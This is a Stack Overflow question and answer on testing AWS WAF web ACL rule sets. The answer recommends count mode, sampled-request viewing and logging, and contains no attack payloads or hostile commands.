'How can I run tests against web ACLs in AWS to be sure the rules are working as intended?
1.) BotControl
2.) AmazonIpReputationList
3.) AnonymousIp
4.) CommonRuleSet
5.) KnownBadInputs
6.) LinuxRuleSet
7.) SQL injection
these are all rule sets I have set in place but is there a way for me to tests against them to make sure they are working as intended?
amazon-web-servicesSolution 1:[1]
basically you would like to test your rules, here is my 2 cents
- Counting the web requests that match the rules in a web ACL
Configure all the rules in a web ACL to count web requests
Set the default action for the web ACL to allow requests
- Viewing a sample of the web requests that API Gateway CloudFront or an Application Load Balancer has forwarded to AWS WAF Classic
In the AWS WAF Classic console, you can view a sample of the requests that API Gateway CloudFront or an Application Load Balancer has forwarded to AWS WAF Classic for inspection. For each sampled request, you can view detailed data about the request, such as the originating IP address and the headers included in the request. You also can view which rule the request matched, and whether the rule is configured to allow or block requests.
- Logging and monitoring web ACL traffic
You can enable logging to get detailed information about traffic that is analyzed by your web ACL. Logged information includes the time that AWS WAF received a web request from your AWS resource, detailed information about the request, and details about the rules that the request matched. You can send your logs to an Amazon CloudWatch Logs log group, an Amazon Simple Storage Service (Amazon S3) bucket, or an Amazon Kinesis Data Firehose.
please refer this doc for more information.
Sources
This article follows the attribution requirements of Stack Overflow and is licensed under CC BY-SA 3.0.
Source: Stack Overflow
| Solution | Source |
|---|---|
| Solution 1 | MrOverflow |